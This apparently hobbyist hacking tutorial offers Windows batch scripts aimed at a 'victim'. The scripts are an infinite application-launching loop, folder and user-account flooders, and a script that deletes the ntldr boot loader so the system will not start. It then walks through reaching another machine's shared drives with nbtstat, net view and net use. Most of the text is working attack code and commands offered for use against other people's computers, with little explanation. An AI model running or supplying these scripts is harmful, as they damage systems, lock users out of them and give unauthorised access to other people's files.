BATCH FILES

Application Bomber

@echo off // It instructs to hide the commands when batch files is executed
:x //loop variable
start winword
start mspaint //open paint
start notepad
start write
start cmd //open command prompt
start explorer
start control
start calc // open calculator
goto x // infinite loop

This code when executed will start open different applications like paint,notepad,command prompt
repeatedly, irritating victim and ofcourse affecting performance.
 Folder flooder
@echo off
:x
md %random% // mak es directory/folder.
goto x
Here %random% is a variable that would generate a positive no. randomly.

 So this code would makestart creating folders whose name can be any random number

User account flooder

@echo off
:x
net user %random% /add //create user account
goto x

This code would start creating windows user accounts whose names could be any random numbers
 Deleting boot files
Goto C drive in Win XP , Tools->Folder Option->View
Now Uncheck the option 'Hide operating system files' and check option 'Show hidden files and folders'.
Click apply
Now you can see the operating system files. There is a one file 'ntldr' which is boot loader used to boot
the windows.
Lets make a batch file to
delete this file from victim's computer and the windows will not start then.
attrib -S -R -H C:\ntldr // -S,-R,-H to clear system file attribute, read only attribute , hidden file attribute respectively
del ntldr //delete ntldr file
After running this batch file , system will not reboot and a normal victim would definitely install the
windows again.


Hacking network Computer with cmd (commands)

Hi all members In this step by step tutorial you will learn about: How to Hack Network Computer using the command prompt.

Things to remember

* CP = Command Prompt
* HDs = Hard Drives

step by Step:

1. Open command prompt if it's block and you don't know how to get to it go to Using the command prompt under a limited account and then continue to step #2.

2. Once in command prompt type

c:\windows>nbtstat -a 203.195.136.156

(instead of the I.P. address type the real I.P. address or the name of the computer your trying to get to) and if you don't know how to get the name of the computer then go to what to do after hacking the C:\ drive and then continue to step #3.

3. Let say that it gives you this

NetBIOS Remote Machine Name Table

Name Type Status

---------------------------------------------
user <00> UNIQUE Registered
workgroup <00> GROUP Registered
user <03> UNIQUE Registered
user <20> UNIQUE Registered

MAC Address = 00-02-44-14-23-E6

The number <20> shows that the victim has enabled the File And Printer Sharing.

-------------------------------------

NOTE - If you do not get this number there are three possible answers

A. You do not get the number <20> . This shows that the victim has not enabled the File and Printer Sharing.

B. You get "Host Not found". This shows that the port 139 is closed or the ip address or computer name doesn't exist or the computer you are trying to get to is turned off.

C. its still doesn’t matter if you don't get the <20> because this is to hack hard drives and not printers

4. Now in command prompt type

c:\windows>net view \\203.195.136.156

Let's suppose we get the following output

Shared resources at \\203.195.136.156
The computer's name will be here

Share name Type Used as Comment

-------------------------------------------
CDISK Disk

The command completed successfully.

5. The name CDISK is one of the things that being shared on command prompt type (the word Disk at the side its just saying what the the thing being shared is a printer, disk or a file)

c:\windows>net use k: \\203.195.136.156\CDISK

You may replace k letter by any other letter, If the command is successful we will get the confirmation - The command was completed successfully

Now just double click on the My Computer icon on your desktop
and there will be a new drive there with the letter that you replaced K with.